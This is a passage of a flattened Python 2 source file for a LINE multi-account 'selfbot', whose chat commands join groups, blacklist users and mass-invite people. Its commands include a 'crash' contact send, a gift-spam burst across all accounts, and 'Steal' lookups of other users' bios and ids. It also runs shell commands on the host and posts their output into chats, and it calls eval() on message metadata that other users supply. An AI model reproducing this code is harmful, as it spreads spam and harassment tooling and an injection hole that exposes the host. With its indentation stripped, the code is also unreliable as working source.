kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
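# op.type 22/24: invited into or left a chat room; with leaveRoom enabled the
# bot leaves rooms immediately.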
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
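# Everything below is the text-command interpreter: op.type 25 messages are
# matched against command strings, most of them gated on msg.from_ being in
# the admin or owner lists.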
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'contact bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#-----------------------------++++-----------------
#=======================================================
elif msg.text.lower() == "crash":
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#-----------------=============================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
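# Gift commands: contentType 9 with PRDID/PRDTYPE/MSGTPL metadata appears to
# send a LINE theme gift; the same product id is reused with a different
# message template number for each slot.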
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
#=================================================
#==================================================
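# Profile management: rename all bot accounts at once or one at a time, and
# update status messages. LINE appears to cap display names at 20 characters
# and status messages at 500, hence the length checks below.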
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif msg.text.lower().startswith("allbio:"):
if msg.from_ in owner:
string = msg.text[7:]  # strip the "Allbio:" prefix, preserving the bio's original case
if len(string.decode('utf-8')) <= 500:
for bot_acc in [cl, ki, kk, kc, ks, kt]:
profile = bot_acc.getProfile()
profile.statusMessage = string
bot_acc.updateProfile(profile)
cl.sendText(msg.to,"successfully changed bio to: " + string)
elif "Bot1 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot1 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
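# Lookup commands backed by third-party endpoints (the joox lyric/music proxy,
# Wikipedia, Instagram page scraping). These external services may no longer
# be available, so failures are reported back into the chat.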
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Song Lyric ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
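# Server-info commands: shell out on the host via subprocess and echo the
# command output back into the chat (admin only).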
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Title : ' + song[0]
hasil += '\nDuration : ' + song[1]
hasil += '\nDownload Link : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
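# Group invitation and ticket management: cancel pending invites and open or
# close the group's join-by-ticket link via a randomly chosen bot account.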
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"This can only be used inside a group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"This can only be used inside a group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#------------------------_--------------------------------------
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif msg.text in ["Creator"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Creator Saya ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
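# Translation commands via goslate; the suffix after "Translate-" selects the
# target language code passed to gs.translate().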
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-jp" in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-jp ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate jp'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-th " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-th ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate th'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
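# Toggle commands: each follows the same pattern - report when the flag is
# already in the requested state, otherwise flip it and confirm.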
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
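# Mention helpers: "Steal mid"/"Steal contact" parse the MENTION metadata of
# a message that tags a user. The metadata is JSON, so json.loads would be a
# safer parser than the eval() used here.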
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
